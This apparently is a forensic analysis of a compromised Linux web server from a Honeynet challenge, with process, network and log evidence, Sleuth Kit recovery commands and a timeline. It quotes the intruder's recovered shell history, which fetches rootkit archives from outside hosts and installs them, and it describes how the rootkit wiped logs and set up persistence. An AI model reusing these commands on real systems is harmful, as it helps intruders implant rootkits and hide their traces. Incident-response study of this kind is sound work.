Preparation
Analysis of the fetched data
Recording
Analysis of the network connections and process information
Answers to the Questions
Analysis of deleted files
Creation of the mactime List
Mounting of the Image
Analysis of unallocated Disk Space
Analysis with the MD5 list
Summary
```
COMMAND   PID USER  FD TYPE DEVICE SIZE NODE NAME
smbd     3137    0  6u IPv4   4571      TCP  *:2003 (LISTEN)
smbd     3137    0 16u IPv4    976      TCP  *:443 (LISTEN)
smbd     3137    0 17u IPv4    977      TCP  *:80 (LISTEN)
(swapd)  3153    0 16u IPv4    976      TCP  *:443 (LISTEN)
(swapd)  3153    0 17u IPv4    977      TCP  *:80 (LISTEN)
initd   15119    0  3u IPv4  15617      TCP  *:65336 (LISTEN)
initd   15119    0  5u IPv4  15619      TCP  *:65436 (LISTEN)
initd   15119    0  6u IPv4  16157      TCP  192.168.1.79:65336->213.154.118.200:1188 (ESTABLISHED)
initd   15119    0  9u IPv4  15909      TCP  192.168.1.79:1146->199.184.165.133:6667 (ESTABLISHED)
initd   15119    0 12u IPv4  16191      TCP  192.168.1.79:1149->64.62.96.42:6667 (ESTABLISHED)
xopen   25239    0  8u IPv4   9972      UDP  *:3049
xopen   25239    0 16u IPv4    976      TCP  *:443 (LISTEN)
xopen   25239    0 17u IPv4    977      TCP  *:80 (LISTEN)
xopen   25241    0  8u IPv4  12302      TCP  *:3128 (LISTEN)
xopen   25241    0 16u IPv4    976      TCP  *:443 (LISTEN)
xopen   25241    0 17u IPv4    977      TCP  *:80 (LISTEN)
lsn     25247    0 16u IPv4    976      TCP  *:443 (LISTEN)
lsn     25247    0 17u IPv4    977      TCP  *:80 (LISTEN)
```
```
040 S root  3137 1 0 69 0 - 475 do_sel 13:33 ? 0:03 smbd -D PWD=/tmp/sand HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/usr/bin/smbd -D
100 S root  3153 1 0 69 0 - 416 wait_f 13:33 ? 0:00 (swapd) PWD=/usr/bin HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu OLDPWD=/tmp/sand SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/usr/bin/(swapd)
040 S root  3247 1 0 69 0 - 368 do_sel 13:33 ? 0:00 syslogd -m 0 PWD=/tmp/sand HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu LANG=en_US SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin _=/sbin/initlog
140 S root  3252 1 0 69 0 - 496 do_sys 13:33 ? 0:00 klogd -2 PWD=/tmp/sand HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu LANG=en_US SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin _=/sbin/initlog
040 S root 25239 1 0 69 0 - 470 wait_f 15:32 ? 0:00 /lib/.x/s/xopen -q -p 3128 PWD=/lib/.x/s HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=4 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/lib/.x/s/xopen OLDPWD=/lib/.x
040 S root 25241 1 0 69 0 - 472 do_sel 15:32 ? 0:00 /lib/.x/s/xopen -q -p 3128 PWD=/lib/.x/s HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=4 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/lib/.x/s/xopen OLDPWD=/lib/.x
140 S root 25247 1 0 69 0 - 417 wait_f 15:32 ? 0:00 /lib/.x/s/lsn PWD=/lib/.x/s HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=4 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/lib/.x/s/lsn OLDPWD=/lib/.x
040 S root 15119 1 0 69 0 - 574 do_sel 16:02 ? 0:00 initd PWD=/etc/opt/psybnc HOSTNAME=sbm79.dtc.apu.edu LESSOPEN=|/usr/bin/lesspipe.sh %s USER=root MACHTYPE=i386-redhat-linux-gnu MAIL=/var/spool/mail/root INPUTRC=/etc/inputrc OLDPWD=/etc/opt BASH_ENV=/root/.bashrc LANG=en_US LOGNAME=root SHLVL=2 SHELL=/bin/bash USERNAME=root HOSTTYPE=i386 OSTYPE=linux-gnu HISTSIZE=1000 HOME=/root TERM=xterm PATH=:PATH SSH_TTY=/dev/pts/0 _=./initd
```
```
/usr/sbin/tcpdump -X -n -r sotm29.tcpdump "host 213.154.118.200"
13:22:56.510346 192.168.1.79.65336 > 213.154.118.200.1188: P 4174526037:4174526159(122) ack 5552923 win 6936 (DF)
0x0000   4500 00a2 506c 4000 4006 db8f c0a8 014f        E...Pl@.@......O
0x0010   d59a 76c8 ff38 04a4 f8d2 3655 0054 bb1b        ..v..8....6U.T..
0x0020   5018 1b18 f772 0000 3a2d 7073 7942 4e43        P....r..:-psyBNC
0x0030   2170 7379 424e 4340 6c61 6d33 727a 2e64        !psyBNC@lam3rz.d
0x0040   6520 5052 4956 4d53 4720 5b5b 5b6b 6762        e.PRIVMSG.[[[kgb
0x0050   5d5d 5d20 3a53 756e 2041 7567 2031 3020        ]]].:Sun.Aug.10.
0x0060   3230 3a33 353a 3031 203a 5573 6572 2073        20:35:01.:User.s
0x0070   6963 2028 5b5b 5b6b 6762 5d5d 5d29 2064        ic.([[[kgb]]]).d
0x0080   6973 636f 6e6e 6563 7469 6e67 2066 726f        isconnecting.fro
0x0090   6d20 7374 6f6e 6564 2073 6572 7665 722e        m.stoned.server.
0x00a0   0d0a                                           ..
[...]
```
```
/usr/sbin/tcpdump -X -n -r sotm29.tcpdump "host 64.62.96.42"
13:22:29.969365 192.168.1.79.1149 > 64.62.96.42.ircd: P 0:9(9) ack 1 win 34752 <nop,nop,timestamp 10802589 404409721> (DF)
0x0000   4500 003d 49e9 4000 4006 8e72 c0a8 014f        E..=I.@.@..r...O
0x0010   403e 602a 047d 1a0b 01c8 c3cc cbd7 603c        @>`*.}........`<
0x0020   8018 87c0 87ad 0000 0101 080a 00a4 d59d        ................
0x0030   181a cd79 5049 4e47 203a 700d 0a               ...yPING.:p..
13:22:35.137116 192.168.1.79.1149 > 64.62.96.42.ircd: FP 9:33(24) ack 1 win 34752 <nop,nop,timestamp 10803107 404409721> (DF)
0x0000   4500 004c 49ea 4000 4006 8e62 c0a8 014f        E..LI.@.@..b...O
0x0010   403e 602a 047d 1a0b 01c8 c3d5 cbd7 603c        @>`*.}........`<
0x0020   8019 87c0 ed12 0000 0101 080a 00a4 d7a3        ................
0x0030   181a cd79 5155 4954 203a 6368 616e 6769        ...yQUIT.:changi
0x0040   6e67 2073 6572 7665 7273 0d0a                  ng.servers..
```
```
# ils -f linux-ext3 -r ../sda1.dd | tail -n +4 | awk -F '|' '$11 > 0 {print $1}' | \
> while read inode
> do
>     icat ../sda1.dd $inode > sda1_icat_$inode
> done
```

(ils prints three header lines, which tail skips; field 11 of its pipe-separated output is the file size, so only deleted inodes that still reference data are handed to icat.)
```
213.154.118.219 - - [10/Aug/2003:13:16:27 -0700] "GET / HTTP/1.1" 400 385 "-" "-"
213.154.118.219 - - [10/Aug/2003:13:16:37 -0700] "GET / HTTP/1.1" 400 385 "-" "-"
213.154.118.219 - - [10/Aug/2003:13:23:17 -0700] "GET /sumthin HTTP/1.0" 404 279 "-" "-"
```
```
[10/Aug/2003 13:24:29 02937] [error] SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[10/Aug/2003 13:24:29 02937] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
```
```
[10/Aug/2003 13:40:28 03272] [error] Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800 (System error follows)
[10/Aug/2003 13:40:28 03272] [error] System: No such file or directory (errno: 2)
```
```
[Sun Aug 10 04:02:01 2003] [notice] Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 configured -- resuming normal operations
[...]
[Sun Aug 10 13:16:27 2003] [error] [client 213.154.118.219] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Sun Aug 10 13:16:37 2003] [error] [client 213.154.118.219] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Sun Aug 10 13:23:17 2003] [error] [client 213.154.118.219] File does not exist: /var/www/html/sumthin
[Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
[Sun Aug 10 13:32:38 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:32:38 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
```

The remainder of the file contains messages like:

```
[Sun Aug 10 13:40:28 2003] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800 (System error follows)
[Sun Aug 10 13:40:28 2003] [error] System: No such file or directory (errno: 2)
```
```
# mkdir data
# fls -f linux-ext3 -m / -r sda1.dd > data/body
# ils -f linux-ext3 -m sda1.dd >> data/body
# cd data
# mactime -b body -i day dayindex -z PDT > timeline
```
```
# mactime -b body -z PDT 08/07/2003 > timeline.20030807
```
```
# cp sda1.dd sda1.fsdebug.dd
# losetup /dev/loop1 /home/ich/sotm29/sda1.fsdebug.dd
# debugfs -w /dev/loop1
debugfs 1.27 (8-Mar-2002)
debugfs: feature -needs_recovery
Filesystem features: has_journal filetype sparse_super
debugfs: quit
# mount -t ext2 -o ro,noexec,noatime,nodev /dev/loop1 /mnt/tmp
```
```
dls -f linux-ext3 ../sda1.dd > sda1.dls
strings -t d sda1.dls > sda1.dls.strings
```
```
wget geocities.com/mybabywhy/rk.tar.gz
tar -zxvf rk.tar.gz
cd sand
./install
wget geocities.com/gavish19/abc.tgz
wget geocities.com/gavish19/abc.tgz
wget www.lugojteam.as.ro/rootkit.tar
ls -a
cd informatii
wget www.lugojteam.as.ro/rootkit.tar
cd /tmp
ls -a
wget www.lugojteam.as.ro/rootkit.tar
wget irinel1979.go.ro/mass2.tgz
```
The file inst
The timeline created by mactime tells us that from 15:30:48 to 15:30:54 PDT adore.o and cleaner.o were built and sp0 and its files were copied to /usr/lib.
- installs the kernel-based rootkit adore under /usr/lib.
- installs a new ssh daemon "sp0" with its configuration files under /usr/lib.
- links /root/.bash_history to /dev/null.
- deletes /var/log/messages (again) and links it to /dev/null. Because syslogd and klogd have not been restarted this time, they still write to the deleted /var/log/messages through their open file descriptor.
- patches /etc/rc.d/rc.sysinit to start an executable named "kflushd", which does not exist anywhere in the filesystem. We assume that the download of this file failed. We downloaded the file ourselves and saw that it was supposed to start adore and the ssh daemon sp0. Since there is no trace of kflushd in our fetched data, we conclude that neither adore nor sp0 was started.
```
dcat -f linux-ext3 ../sda1.dd 38994 3675648 > yy
tail -c +3585 yy > rootkit.tar
tar xivf rootkit.tar --ignore-failed-read
```
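The `tail -c +3585` step above is the by-hand version of locating where the archive starts inside the carved data units. As an added example that is not part of the original analysis, the following Python finds that offset by scanning for a tar header and validating its checksum, so a stray "ustar" string in unallocated space is not mistaken for an archive; the filler, archive and member names are constructed.

```python
import io
import tarfile

MAGIC_OFF = 257  # the "ustar" magic sits at byte 257 of every 512-byte tar header


def ustar_header_ok(hdr: bytes) -> bool:
    """Check the ustar magic and the header checksum (octal in bytes 148-155,
    computed over the header with that field counted as eight spaces)."""
    if len(hdr) < 512 or hdr[MAGIC_OFF:MAGIC_OFF + 5] != b"ustar":
        return False
    field = hdr[148:156].split(b"\0")[0].strip()
    if not field.isdigit():
        return False
    return int(field, 8) == sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:512])


def find_tar_offset(blob: bytes) -> int:
    """Byte offset of the first valid tar header in blob, or -1.
    'tail -c +N' wants N = offset + 1 (offset 3584 -> 'tail -c +3585')."""
    pos = blob.find(b"ustar")
    while pos != -1:
        start = pos - MAGIC_OFF
        if start >= 0 and ustar_header_ok(blob[start:start + 512]):
            return start
        pos = blob.find(b"ustar", pos + 1)
    return -1


def carve_member_names(blob: bytes) -> list:
    """List the members of the archive embedded in blob without writing to disk."""
    off = find_tar_offset(blob)
    if off < 0:
        return []
    with tarfile.open(fileobj=io.BytesIO(blob[off:]), mode="r:") as tf:
        return tf.getnames()


def build_sample_blob() -> bytes:
    """Constructed sample: 3584 bytes of filler followed by a tiny two-member
    archive, mirroring the dcat output above where the tar began at byte 3585."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name in ("sand/install", "sand/inst"):  # constructed member names
            data = b"sample content of " + name.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return bytes(range(256)) * 14 + buf.getvalue()
```

Listing members from memory first lets you see what the carved archive contains before anything is unpacked onto the analysis host.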
```
# cd /mnt/tmp
# find . -type f -print | xargs --replace md5sum {} > /home/ich/sotm29/linusotm29.md5s
# cd /home/ich/sotm29
# cat linusotm29.md5s | perl -pe 's#(^[^.]*)\.(.*$)#$1$2#;' | sort -k 2 > sotm29-md5s.sort
```
```
# wget http://project.honeynet.org/scans/scan29/linux-suspended-md5s.gz
# gzip -dc linux-suspended-md5s.gz | sort -k 2 > linux-suspended-md5s.sort
# diff linux-suspended-md5s.sort sotm29-md5s.sort > suspended-sotm29.diff
```
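The raw diff produced above mixes three kinds of findings. As an added example (not the original author's code), the following Python performs the same path normalization as the perl substitution (turning `./usr/bin/smbd` from `find .` into `/usr/bin/smbd`) and then separates files that are missing, added, or present with a changed hash; the two listings and their hash values are constructed placeholders.

```python
def parse_md5sum(text: str) -> dict:
    """Parse md5sum output ('HASH  PATH' per line) into {path: hash}. A leading
    './' produced by 'find .' in the mounted image becomes '/', which is what
    the perl substitution above does, so both lists use absolute paths."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, path = line.split(None, 1)  # maxsplit keeps spaces in paths
        if path.startswith("./"):
            path = path[1:]
        entries[path] = digest.lower()
    return entries


def compare_md5_lists(reference: str, image: str) -> dict:
    """Split the comparison into the three questions an analyst asks: which
    files vanished, which appeared, and which exist in both but differ."""
    ref, img = parse_md5sum(reference), parse_md5sum(image)
    return {
        "missing": sorted(set(ref) - set(img)),
        "added": sorted(set(img) - set(ref)),
        "modified": sorted(p for p in ref if p in img and ref[p] != img[p]),
    }


# Constructed sample listings; the hashes are placeholders, not values from the image.
REFERENCE = """\
11111111111111111111111111111111  /bin/ls
22222222222222222222222222222222  /bin/ps
33333333333333333333333333333333  /etc/rc.d/rc.sysinit
44444444444444444444444444444444  /var/log/messages
"""
IMAGE = """\
11111111111111111111111111111111  ./bin/ls
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  ./bin/ps
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb  ./etc/rc.d/rc.sysinit
cccccccccccccccccccccccccccccccc  ./usr/bin/smbd
dddddddddddddddddddddddddddddddd  ./lib/.x/s/xopen
"""


def sample_report() -> dict:
    """Run the comparison on the constructed listings."""
    return compare_md5_lists(REFERENCE, IMAGE)
```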
```
id
uptime
./inst
hostname
hostname sbm79.dtc.apu.edu
cd /dev/shm/sc
./install sbm79.dtc.apu.edu
rm -rf /var/mail/root
ps x
cd /tmp
ls -a
wget izolam.net/sslstop.tar.gz
ps x
ps aux | grep apache
kill -9 21510 21511 23289 23292 23302
```
| Time (PDT) | Event |
|---|---|
| 13:24:29 | Initial break-in using a buffer overflow hole during the SSL2 handshake process of OpenSSL. The attack originated from 213.154.118.21. |
| 13:33:32 - 13:33:57 | Download and installation of rk.tar.gz; start of "smbd -D" and "(swapd)". |
| 14:14:01 | Probable download of rootkit.tar.gz ("sonkeriki rootkit"). |
| 15:30:48 - 15:30:54 | adore.o and cleaner.o were built and sp0 and its files were copied to /usr/lib. sp0 and adore have probably never been started because of a missing startup file "kflushd". |
| 15:32:15 | Download, installation and start of suckit, xopen and lsn. The execution of suckit failed. |
| 15:49:47 - 15:52:23 | Download and execution of /root/sslstop.tar.gz |
| 15:54:24 | Failed restart of httpd. |
| 15:57:12 - 16:02:36 | Download and installation of psyBNC. |
```
COMMAND   PID USER  FD TYPE DEVICE SIZE NODE NAME
smbd     3137    0  6u IPv4   4571      TCP  *:2003 (LISTEN)
initd   15119    0  3u IPv4  15617      TCP  *:65336 (LISTEN)
initd   15119    0  5u IPv4  15619      TCP  *:65436 (LISTEN)
initd   15119    0  6u IPv4  16157      TCP  192.168.1.79:65336->213.154.118.200:1188 (ESTABLISHED)
initd   15119    0  9u IPv4  15909      TCP  192.168.1.79:1146->199.184.165.133:6667 (ESTABLISHED)
initd   15119    0 12u IPv4  16191      TCP  192.168.1.79:1149->64.62.96.42:6667 (ESTABLISHED)
xopen   25239    0  8u IPv4   9972      UDP  *:3049
xopen   25241    0  8u IPv4  12302      TCP  *:3128 (LISTEN)
```
```
tcp        0      0 192.168.1.79:65336      213.154.118.200:1188    ESTABLISHED 15119/initd   (1)
tcp        0      9 192.168.1.79:1149       64.62.96.42:6667        ESTABLISHED 15119/initd   (2)
tcp        0      0 192.168.1.79:1146       199.184.165.133:6667    ESTABLISHED 15119/initd   (3)
```
| Time (PDT) | Executable | Remarks |
|---|---|---|
| 13:33:32 | /usr/bin/smbd -D | Part of rk.tar.gz |
| 15:30:48 | /usr/lib/sp0 | Installed together with adore |
| 15:32:16 | /lib/.x/s/xopen | Installed together with SucKIT |